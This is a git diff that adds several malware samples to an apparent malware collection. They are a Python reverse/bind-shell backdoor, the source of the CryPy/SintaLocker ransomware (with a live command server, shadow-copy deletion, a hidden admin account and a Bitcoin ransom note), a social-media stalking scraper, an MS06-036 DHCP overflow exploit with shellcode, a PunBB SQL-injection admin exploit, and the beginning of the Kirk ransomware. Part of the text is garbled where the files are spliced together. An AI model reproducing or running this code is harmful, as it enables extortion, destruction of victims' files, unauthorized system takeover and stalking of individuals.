diff --git a/Python/AngstStealer.7z b/Python/AngstStealer.7z new file mode 100644 index 00000000..a03f5e35 Binary files /dev/null and b/Python/AngstStealer.7z differ diff --git a/Python/Aris.7z b/Python/Aris.7z new file mode 100644 index 00000000..8c7d1bdb Binary files /dev/null and b/Python/Aris.7z differ diff --git a/Python/Backdoor.Python.RShell b/Python/Backdoor.Python.RShell new file mode 100644 index 00000000..3c57bd43 --- /dev/null +++ b/Python/Backdoor.Python.RShell @@ -0,0 +1,121 @@ +#!/usr/bin/env python + +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # +# d00r.py 0.3a (reverse|bind)-shell in python by fQ # +# # +# alpha # +# # +# # +# usage: # +# % ./d00r -b password port # +# % ./d00r -r password port host # +# % nc host port # +# % nc -l -p port (please use netcat) # +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + +import os, sys, socket, time + + +# =================== var ======= +MAX_LEN=1024 +SHELL="/bin/zsh -c" +TIME_OUT=300 #s +PW="" +PORT="" +HOST="" + + +# =================== funct ===== +# shell - exec command, return stdout, stderr; improvable +def shell(cmd): + sh_out=os.popen(SHELL+" "+cmd).readlines() + nsh_out="" + for i in range(len(sh_out)): + nsh_out+=sh_out[i] + return nsh_out + +# action? +def action(conn): + conn.send("\nPass?\n") + try: pw_in=conn.recv(len(PW)) + except: print "timeout" + else: + if pw_in == PW: + conn.send("j00 are on air!\n") + while True: + conn.send(">>> ") + try: + pcmd=conn.recv(MAX_LEN) + except: + print "timeout" + return True + else: + #print "pcmd:",pcmd + cmd=""#pcmd + for i in range(len(pcmd)-1): + cmd+=pcmd[i] + if cmd==":dc": + return True + elif cmd==":sd": + return False + else: + if len(cmd)>0: + out=shell(cmd) + conn.send(out) + + +# =================== main ====== +argv=sys.argv + +if len(argv)<4: + print "error; help: head -n 16 d00r.py" + sys.exit(1) +elif argv[1]=="-b": + PW=argv[2] + PORT=argv[3] +elif argv[1]=="-r" and len(argv)>4: + PW=argv[2] + PORT=argv[3] + HOST=argv[4] +else: exit(1) + +PORT=int(PORT) +print "PW:",PW,"PORT:",PORT,"HOST:",HOST + +#sys.argv[0]="d00r" + +# exit father proc +if os.fork()!=0: + sys.exit(0) + +# associate the socket +sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(TIME_OUT) + +if argv[1]=="-b": + sock.bind(('localhost', PORT)) + sock.listen(0) + +run=True +while run: + + if argv[1]=="-r": + try: sock.connect( (HOST, PORT) ) + except: + print "host unreachable" + time.sleep(5) + else: run=action(sock) + else: + try: (conn,addr)=sock.accept() + except: + print "timeout" + time.sleep(1) + else: run=action(conn) + + # shutdown the sokcet + if argv[1]=="-b": conn.shutdown(2) + else: + try: sock.send("") + except: time.sleep(1) + else: sock.shutdown(2) \ No newline at end of file diff --git a/Python/CryPy_Source.py b/Python/CryPy_Source.py new file mode 100644 index 00000000..394a922d --- /dev/null +++ b/Python/CryPy_Source.py @@ -0,0 +1,463 @@ +import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2 +import SintaRegistery +import SintaChangeWallpaper +from Crypto import Random +from Crypto.Cipher import AES +rmsbrand = 'SintaLocker' +newextns = 'sinta' +encfolder = '__SINTA I LOVE YOU__' +email_con = 'sinpayy@yandex.com' +btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1' +userhome = os.path.expanduser('~') +my_server = 'http://www.dobrebaseny.pl/js/lib/srv/' +wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg' +victim_info = base64.b64encode(str(platform.uname())) +configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname())) +glob_config = None +try: + glob_config = json.loads(urllib.urlopen(configurl).read()) + if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']): + raise Exception('0x00001') +except IOError: + time.sleep(1) + +victim_id = glob_config[u'MRU_ID'] +victim_r = glob_config[u'MRU_UDP'] +victim_s = glob_config[u'MRU_PDP'] +try: + os.system('bcdedit /set {default} recoveryenabled No') + os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f') +except WindowsError: + pass + +def setWallpaper(imageUrl): + try: + wallpaper = SintaChangeWallpaper.ChangeWallpaper() + wallpaper.downloadWallpaper(imageUrl) + except: + pass + + +def persistance(): + try: + SintaRegistery.addRegistery(os.path.realpath(__file__)) + except: + pass + + +def destroy_shadow_copy(): + try: + os.system('vssadmin Delete Shadows /All /Quiet') + except: + pass + + +def create_remote_desktop(): + try: + os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f') + os.system('net user ' + victim_r + ' ' + victim_s + ' /add') + os.system('net localgroup administrators ' + victim_r + ' /add') + except: + pass + + +def write_instruction(dir, ext): + try: + files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w') + files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '') + except: + pass + + +def delete_file(filename): + try: + os.remove(filename) + except: + pass + + +def find_files(root_dir): + write_instruction(root_dir, 'md') + extentions = ['*.txt', + '*.exe', + '*.php', + '*.pl', + '*.7z', + '*.rar', + '*.m4a', + '*.wma', + '*.avi', + '*.wmv', + '*.csv', + '*.d3dbsp', + '*.sc2save', + '*.sie', + '*.sum', + '*.ibank', + '*.t13', + '*.t12', + '*.qdf', + '*.gdb', + '*.tax', + '*.pkpass', + '*.bc6', + '*.bc7', + '*.bkp', + '*.qic', + '*.bkf', + '*.sidn', + '*.sidd', + '*.mddata', + '*.itl', + '*.itdb', + '*.icxs', + '*.hvpl', + '*.hplg', + '*.hkdb', + '*.mdbackup', + '*.syncdb', + '*.gho', + '*.cas', + '*.svg', + '*.map', + '*.wmo', + '*.itm', + '*.sb', + '*.fos', + '*.mcgame', + '*.vdf', + '*.ztmp', + '*.sis', + '*.sid', + '*.ncf', + '*.menu', + '*.layout', + '*.dmp', + '*.blob', + '*.esm', + '*.001', + '*.vtf', + '*.dazip', + '*.fpk', + '*.mlx', + '*.kf', + '*.iwd', + '*.vpk', + '*.tor', + '*.psk', + '*.rim', + '*.w3x', + '*.fsh', + '*.ntl', + '*.arch00', + '*.lvl', + '*.snx', + '*.cfr', + '*.ff', + '*.vpp_pc', + '*.lrf', + '*.m2', + '*.mcmeta', + '*.vfs0', + '*.mpqge', + '*.kdb', + '*.db0', + '*.mp3', + '*.upx', + '*.rofl', + '*.hkx', + '*.bar', + '*.upk', + '*.das', + '*.iwi', + '*.litemod', + '*.asset', + '*.forge', + '*.ltx', + '*.bsa', + '*.apk', + '*.re4', + '*.sav', + '*.lbf', + '*.slm', + '*.bik', + '*.epk', + '*.rgss3a', + '*.pak', + '*.big', + '*.unity3d', + '*.wotreplay', + '*.xxx', + '*.desc', + '*.py', + '*.m3u', + '*.flv', + '*.js', + '*.css', + '*.rb', + '*.png', + '*.jpeg', + '*.p7c', + '*.p7b', + '*.p12', + '*.pfx', + '*.pem', + '*.crt', + '*.cer', + '*.der', + '*.x3f', + '*.srw', + '*.pef', + '*.ptx', + '*.r3d', + '*.rw2', + '*.rwl', + '*.raw', + '*.raf', + '*.orf', + '*.nrw', + '*.mrwref', + '*.mef', + '*.erf', + '*.kdc', + '*.dcr', + '*.cr2', + '*.crw', + '*.bay', + '*.sr2', + '*.srf', + '*.arw', + '*.3fr', + '*.dng', + '*.jpeg', + '*.jpg', + '*.cdr', + '*.indd', + '*.ai', + '*.eps', + '*.pdf', + '*.pdd', + '*.psd', + '*.dbfv', + '*.mdf', + '*.wb2', + '*.rtf', + '*.wpd', + '*.dxg', + '*.xf', + '*.dwg', + '*.pst', + '*.accdb', + '*.mdb', + '*.pptm', + '*.pptx', + '*.ppt', + '*.xlk', + '*.xlsb', + '*.xlsm', + '*.xlsx', + '*.xls', + '*.wps', + '*.docm', + '*.docx', + '*.doc', + '*.odb', + '*.odc', + '*.odm', + '*.odp', + '*.ods', + '*.odt', + '*.sql', + '*.zip', + '*.tar', + '*.tar.gz', + '*.tgz', + '*.biz', + '*.ocx', + '*.html', + '*.htm', + '*.3gp', + '*.srt', + '*.cpp', + '*.mid', + '*.mkv', + '*.mov', + '*.asf', + '*.mpeg', + '*.vob', + '*.mpg', + '*.fla', + '*.swf', + '*.wav', + '*.qcow2', + '*.vdi', + '*.vmdk', + '*.vmx', + '*.gpg', + '*.aes', + '*.ARC', + '*.PAQ', + '*.tar.bz2', + '*.tbk', + '*.bak', + '*.djv', + '*.djvu', + '*.bmp', + '*.cgm', + '*.tif', + '*.tiff', + '*.NEF', + '*.cmd', + '*.class', + '*.jar', + '*.java', + '*.asp', + '*.brd', + '*.sch', + '*.dch', + '*.dip', + '*.vbs', + '*.asm', + '*.pas', + '*.ldf', + '*.ibd', + '*.MYI', + '*.MYD', + '*.frm', + '*.dbf', + '*.SQLITEDB', + '*.SQLITE3', + '*.asc', + '*.lay6', + '*.lay', + '*.ms11 (Security copy)', + '*.sldm', + '*.sldx', + '*.ppsm', + '*.ppsx', + '*.ppam', + '*.docb', + '*.mml', + '*.sxm', + '*.otg', + '*.slk', + '*.xlw', + '*.xlt', + '*.xlm', + '*.xlc', + '*.dif', + '*.stc', + '*.sxc', + '*.ots', + '*.ods', + '*.hwp', + '*.dotm', + '*.dotx', + '*.docm', + '*.DOT', + '*.max', + '*.xml', + '*.uot', + '*.stw', + '*.sxw', + '*.ott', + '*.csr', + '*.key', + 'wallet.dat'] + for dirpath, dirs, files in os.walk(root_dir): + if 'Windows' not in dirpath: + for basename in files: + for ext in extentions: + if fnmatch.fnmatch(basename, ext): + filename = os.path.join(dirpath, basename) + yield filename + + +def make_directory(file_path): + directory = file_path + '' + encfolder + if not os.path.exists(directory): + try: + os.makedirs(directory) + except: + pass + + +def text_generator(size = 6, chars = string.ascii_uppercase + string.digits): + return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns + + +def generate_file(file_path, filename): + make_directory(file_path) + key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ]) + newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm') + try: + encrypt_file(key, filename, newfilename) + except: + pass + + +def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16): + if not out_filename: + out_filename = newfilename + iv = ''.join((chr(random.randint(0, 255)) for i in range(16))) + encryptor = AES.new(key, AES.MODE_CBC, iv) + filesize = os.path.getsize(in_filename) + with open(in_filename, 'rb') as infile: + with open(out_filename, 'wb') as outfile: + outfile.write(struct.pack(' 1: + global urls_stalk + pastebin_url = "https://pastebin.com/u/" + user + pastebin_str = "s Pastebin - Pastebin.com" + patreon_url = "https://www.patreon.com/" + user + patreon_str = 'created_at' + gutefrage_url = "https://www.gutefrage.net/nutzer/" + user + gutefrage_str = '' + facebook_url = 'https://facebook.com/' + user + facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user + instagram_url = "https://www.instagram.com/" + user + "/" + instagram_str = '' + steam_url = "https://steamcommunity.com/id/" + user + steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif' + twitch_url = "https://www.twitch.tv/" + user + twitch_str = "content='twitch://stream/" + user + lachschon_url = "https://www.lachschon.de/community/user/" + user + "/" + lachschon_str = '' + + URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url] + STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str] + + for i in range(0, len(URLS)): + html = getResponse(URLS[i]) + if STRS[i].lower() in str(html).lower(): + print("\t> " + URLS[i]) + urls_stalk.append(URLS[i]) + +def get_twitter_img(user): + url = "https://twitter.com/" + user + html = subprocess.getoutput("phantomjs html.js " + url) + image = find_between(html, '')
+    r = requests.get(image)
+    with open('Twitter.jpg', 'wb') as f:
+        f.write(r.content)
+
+def get_instagram_img(user):
+    data = {
+    'username': user,
+    'submit': 'View DP'
+    }
+    response = requests.post('https://fullinstadp.com/index.php', data=data)
+    html = response.text
+    f = open(https?://[^\s]+)", word).group("url") + if '//t.co/' in url: + last = url[-1:] + if last == ".": + url = url.rstrip('.') + r = requests.get(url) + url = r.url + urls.append(url) + except: + e = "" + +def check_string_socialmedia(string): + global social_media + count = 0 + next = 0 + for word in string.split(" "): + next = count + 2 + if 'facebook' in word.lower(): + print(string.split(" ")[next]) + count +=1 + +def youtube(url): + url = url + "/about" + html = subprocess.getoutput("phantomjs html.js " + url) + tmp_str = html.split('"}},"urlEndpoint":') + for url in tmp_str: + #print(url) + url = find_between(url, '{"url":"', '","target":') + print(html) + +def grab_instagram(profile): + global done_checks + global urls + global instagram + global usernames + global compare + if not "instagram: " + profile in done_checks: + if not profile in usernames: + usernames.append(profile) + url = "https://www.instagram.com/" + profile + "/" + html = subprocess.getoutput("phantomjs html.js " + url) + if '"@type":"Person","name":"' in html: + display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"') + if not display_name in usernames: + usernames.append(display_name) + if not "instagram: " + display_name in done_checks: + print(display_name) + stalk(display_name) + instagram.append("Display Name: " + display_name) + description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer') + follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer') + check_string_mail(description) + check_string_url(description) + instagram.append("Description: " + description) + instagram.append("Follower: " + follower) + #get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion + compare = True + if not "instagram: " + profile in done_checks: + done_checks.append("instagram: " + profile) + +def grab_steam(url): + global done_checks + global urls + global usernames + if not "steam: " + profile in done_checks: + url = url + "/ajaxaliases/" + response = requests.get(url) + html = response.text + for item in html.split("newname"): + username = find_between(item, '":"', '","timechanged') + if not username in usernames: + usernames.append(username) + + + +def grab_twitter(profile): + global done_checks + global urls + global adresse + global usernames + global twitter + global first_dl + if not "twitter: " + profile in done_checks: + url = "https://twitter.com/" + profile + urls.append(url) + html = subprocess.getoutput("phantomjs html.js " + url) + #variables + display_name = find_between(html, '', ' (@') + if not profile in usernames: + usernames.append(profile) + if not display_name in usernames: + usernames.append(display_name) + if not "twitter: " + display_name in done_checks: + print(display_name) + stalk(display_name) + join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten') + description = "" + url = "" + location = "" + #if + if '<meta name="description"' in html: + description = find_between(html, '<meta name="description" content="', '">') + description = description.replace(""", "") + check_string_mail(description) + check_string_url(description) + if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html: + tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>') + url = find_between(tmp, '" title="', '">') + urls.append(url) + if 'location":"' in html: + location = find_between(html, '"location":"', '","url') + if len(location) > 0: + adresse = location + twitter.append("Display Name: " + display_name) + twitter.append("Join Date: " + join_date) + twitter.append("Description: " + description) + twitter.append("URL: " + url) + twitter.append("Location: " + location) + twitter.append(" ") + #if first_dl == False: + #get_twitter_img(profile) + #first_dl = True + if not "twitter: " + profile in done_checks: + done_checks.append("twitter: " + profile) + + + +def handle(): + try: + if sys.argv[1]: + social_media = sys.argv[1].lower() + if sys.argv[2]: + info_type = sys.argv[2].lower() + if sys.argv[3]: + infos = sys.argv[3].lower() + if info_type == "url": + if social_media == "youtube": + youtube(infos) + elif info_type == "profile": + if social_media == "twitter": + grab_twitter(infos) + elif info_type == "user": + if social_media == "stalk": + stalk(infos) + except Exception as e: + print(e) + +def find_between( s, first, last ): + try: + start = s.index( first ) + len( first ) + end = s.index( last, start ) + return s[start:end] + except ValueError: + return "" + +def getResponse(url): + response = requests.get(url) + #response.raise_for_status() + data = response.content + return data + + + +handle() + +for url in urls_stalk: + #print(url) + if 'twitter.com' in url: + checked = False + profile = url.split("/")[3] + for check in done_checks: + if check == "twitter: " + profile: + checked = True + if not checked: + grab_twitter(profile) + done_checks.append("twitter:" + profile) + + if 'instagram.com' in url: + checked = False + profile = url.split("/")[3] + for check in done_checks: + if check == "instagram: " + profile: + checked = True + if not checked: + grab_instagram(profile) + #print("Download Profile Picture") + done_checks.append("instagram: " + profile) + #Steam Check direkt in der Stalk Funktion + if 'steamcommunity.com' in url: + checked = False + profile = url.split("/")[4] + for check in done_checks: + if check == "steam: " + profile: + checked = True + if not checked: + grab_steam(url) + done_checks.append("steam: " + profile) + + +print("------------------") +print("Usernames:") +print("------------------") +for user in usernames: + print(user) + stalk(user) + +if len(urls) > 0: + print("------------------") + print("URLs:") + print("------------------") + for url in urls: + print(url) + +if len(twitter) > 0: + print("------------------") + print("Twitter:") + print("------------------") + for item in twitter: + print(item) + +if len(instagram) > 0: + print("------------------") + print("Instagram:") + print("------------------") + for item in instagram: + print(item) + +if len(steam) > 0: + print("------------------") + print("Steam:") + print("------------------") + for item in steam: + print(item) + +print("------------------") +print("Sites checked:") +print("------------------") +for check in done_checks: + print(check) diff --git a/Python/Exploit.Python.Ms06-036.a b/Python/Exploit.Python.Ms06-036.a new file mode 100644 index 00000000..3dea8e3a --- /dev/null +++ b/Python/Exploit.Python.Ms06-036.a @@ -0,0 +1,237 @@ +#!/usr/bin/env python +# +# +# by redsand@blacksecurity.org +# this (like any thing) would not be possible w/out the bl4ck team. +# thanks guys. +# + +import sys, os + +sys.path.append("pydhcplib") + +from scapy import * + +from pydhcplib.dhcp_packet import * +from pydhcplib.dhcp_network import * +from pydhcplib.type_strlist import * +from pydhcplib.type_ipv4 import * +from pydhcplib.type_hw_addr import * + +inet_face = "vmnet8" + +default_ip = "10.31.33.7" + +# user bl4ck/bl4ck +# this exits via Thread (so thta we kill the dhcp thread in services.exe +# +# this means if services doesn't crash, it was a successful exploit +# +scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \ +"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \ +"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \ +"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \ +"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \ +"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \ +"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \ +"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \ +"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \ +"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \ +"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \ +"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \ +"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \ +"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \ +"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5" + + + +netopt = {'client_listen_port':"68", + 'server_listen_port':"67", + 'listen_address':"0.0.0.0"} + + +def substr(i,o,off): + begin=i[:off] + end=i[off+len(o):] + ret=begin+o+end + return ret + +def io(i): + str="" + a=chr(i % 256) + i=i >> 8 + b=chr(i % 256) + i=i >> 8 + c=chr(i % 256) + i=i >> 8 + d=chr(i % 256) + + str+="%c%c%c%c" % (a,b,c,d) + + return str + +class Server(DhcpServer): + def __init__(self, options): + DhcpServer.__init__(self,options["listen_address"], + options["client_listen_port"], + options["server_listen_port"]) + + def HandleDhcpDiscover(self, packet): + my_reqip = '' + + my_reqip = default_ip + + sid_i = my_reqip.rfind(".") + server_ip = my_reqip[0:sid_i] + ".254" + + our_ip = my_reqip[0:sid_i] + ".2" + + mymac = hwmac(packet.GetHardwareAddress()).str() + print "** Received discover from %s (%s)" % (mymac,my_reqip) + + mpacket = DhcpPacket() + mpacket.CreateDhcpOfferPacketFrom(packet) + mpacket.SetOption("dhcp_message_type",[2]) + mpacket.SetOption("yiaddr", ipv4(my_reqip).list()) + mpacket.SetOption("siaddr", ipv4(server_ip).list()) + mpacket.SetOption("ip_address_lease_time",[0,0,7,8]) + mpacket.SetOption("flags",[0,0]) + mpacket.SetOption("server_identifier", ipv4(server_ip).list()) + mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list()) + mpacket.SetOption("domain_name_server", ipv4(our_ip).list()) + mpacket.SetOption("router",ipv4(our_ip).list()) + + mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list()) + + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + + p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('') + + print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip) + sendp(p, iface=inet_face, verbose=False) + + def HandleDhcpRequest(self, packet): + + + ip = packet.GetOption("request_ip_address") + sid = packet.GetOption("server_identifier") + ciaddr = packet.GetOption("ciaddr") + my_reqip = '' + try: + data = packet.options_data['request_ip_address'] + for i in range(0,len(data),4) : + if len(data[i:i+4]) == 4 : + my_reqip += ipv4(data[i:i+4]).str() + except: + my_reqip = default_ip + + mymac = hwmac(packet.GetHardwareAddress()).str() + print "** Received request from %s (%s)" % (my_reqip,mymac) + sid_i = my_reqip.rfind(".") + server_ip = my_reqip[0:sid_i] + ".254" + + our_ip = my_reqip[0:sid_i] + ".2" + + mypacket = DhcpPacket() + mypacket.CreateDhcpAckPacketFrom(packet) + mypacket.SetOption("yiaddr", ipv4(my_reqip).list()) + + dumbstr = "\x90" * 0xFF + + # we're looking for a jmp/call ebx ?! or landing in our codespace + # directly + + # C5 converts to 253C + # BB = 2557 + # AA = 00AC + # DD = 258C + # EE = 03B5 + # 88 = 00D6 + # 99 = 00EA + # F3 = 2591 + # B0 = 2264 + # 8F = 00c5 + + eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64" + #eipstr = "C" * 0xFF + + + payload = "\x42" * 0xFF + payload = substr(payload, scode, 1) + + + ## find location in heap to ret2 + # find offset & append as many "\x26\x6e\x43\x6e" + # to increment ebx to a non trashed location (since ebx points to our code) + # then push ebx \x53 and \xc4 (retn) + # + # we're looking for a pop+pop+ret or a jmp/call ebx to return to our + # unicode filtered input + # note it must be iwthin the bounds of 0x0000**** - 0x0070**** + # or 0x22***** <-- wont help us + + append = "\x0f\xff" + ( "\x90" * 0xff ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( eipstr ) + append += "\xfa\xff" + ( eipstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( payload[0:254]) + "\x00" + + print "Length of our attack: %r" % len(append) + + eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face)) + p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024) + print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip) + for i in p: + sendp(eth/i, iface=inet_face, verbose=False) + + def HandleDhcpDecline(self, packet): + return + #print "** Dhcp Declined" + #packet.PrintHeaders() + #packet.PrintOptions() + + def HandleDhcpRelease(self, packet): + return + #packet.PrintHeaders() + #packet.PrintOptions() + + def HandleDhcpInform(self, packet): + return + #packet.PrintHeaders() + #packet.PrintOptions() + + + +print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow" +print "\t by redsand@blacksecurity.org" +print "Usage: %s [interface] [forced request ip]" % sys.argv[0] +print "" + + +if len(sys.argv) > 1: + inet_face = sys.argv[1] + +if len(sys.argv) > 2: + default_ip = sys.argv[2] + +print "Listening for client requests:\n" +print "Listening on interface: %s" % inet_face +print "Using default address: %s" % default_ip + +server = Server(netopt) + +while True : + server.GetNextDhcpPacket() diff --git a/Python/Exploit.Python.PunBB.a b/Python/Exploit.Python.PunBB.a new file mode 100644 index 00000000..7e050115 --- /dev/null +++ b/Python/Exploit.Python.PunBB.a @@ -0,0 +1,130 @@ +#!/usr/bin/python +####################################################################### +# _ _ _ _ ___ _ _ ___ +# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ +# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ +# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| +# +####################################################################### +# Proof of concept code from the Hardened-PHP Project +####################################################################### +# +# -= PunBB 1.2.4 =- +# change_email SQL injection exploit +# +# user-supplied data within the database is still user-supplied data +# +####################################################################### + +import urllib +import getopt +import sys +import string + +__argv__ = sys.argv + +def banner(): + print "PunBB 1.2.4 - change_email SQL injection exploit" + print "Copyright (C) 2005 Hardened-PHP Project\n" + +def usage(): + banner() + print "Usage:\n" + print " $ ./punbb_change_email.py [options]\n" + print " -h http_url url of the punBB forum to exploit" + print " f.e. http://www.forum.net/punBB/" + print " -u username punBB forum useraccount" + print " -p password punBB forum userpassword" + print " -e email email address where the admin leve activation email is sent" + print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails" + print "" + sys.exit(-1) + +def main(): + try: + opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:") + except getopt.GetoptError: + usage() + + if len(__argv__) < 10: + usage() + + username = None + password = None + email = None + domain = None + host = None + for o, arg in opts: + if o == "-h": + host = arg + if o == "-u": + username = arg + if o == "-p": + password = arg + if o == "-e": + email = arg + if o == "-d": + domain = arg + + # Printout banner + banner() + + # Check if everything we need is there + if host == None: + print "[-] need a host to connect to" + sys.exit(-1) + if username == None: + print "[-] username needed to continue" + sys.exit(-1) + if password == None: + print "[-] password needed to continue" + sys.exit(-1) + if email == None: + print "[-] email address needed to continue" + sys.exit(-1) + if domain == None: + print "[-] catch all domain needed to continue" + sys.exit(-1) + + # Retrive cookie + params = { + 'req_username' : username, + 'req_password' : password, + 'form_sent' : 1 + } + + wclient = urllib.URLopener() + + print "[+] Connecting to retrieve cookie" + + req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params)) + info = req.info() + if 'set-cookie' not in info: + print "[-] Unable to retrieve cookie... something is wrong" + sys.exit(-3) + cookie = info['set-cookie'] + cookie = cookie[:string.find(cookie, ';')] + print "[+] Cookie found - extracting user_id" + user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")] + print "[+] User-ID: %d" % (int(user_id)) + wclient.addheader('Cookie', cookie); + + email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\',' + append = 'group_id=\'1' + email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain + + params = { + 'req_new_email' : email, + 'form_sent' : 1 + } + + print "[+] Connecting to request change email" + req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params)) + + print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin" + +if __name__ == "__main__": + main() + + + diff --git a/Python/Kirk_ransomware.py b/Python/Kirk_ransomware.py new file mode 100644 index 00000000..3d4ff750 --- /dev/null +++ b/Python/Kirk_ransomware.py @@ -0,0 +1,208 @@ +# Python bytecode 2.7 (62211) +# Decompiled from: Python 2.7.14 (default, Sep 25 2017, 09:53:22) +""" + +Kirk encryptor + +""" +import tkMessageBox, Tkinter as tk +from Crypto.Cipher import AES +from Crypto.PublicKey import RSA +from Crypto.Hash import SHA256 +import os, 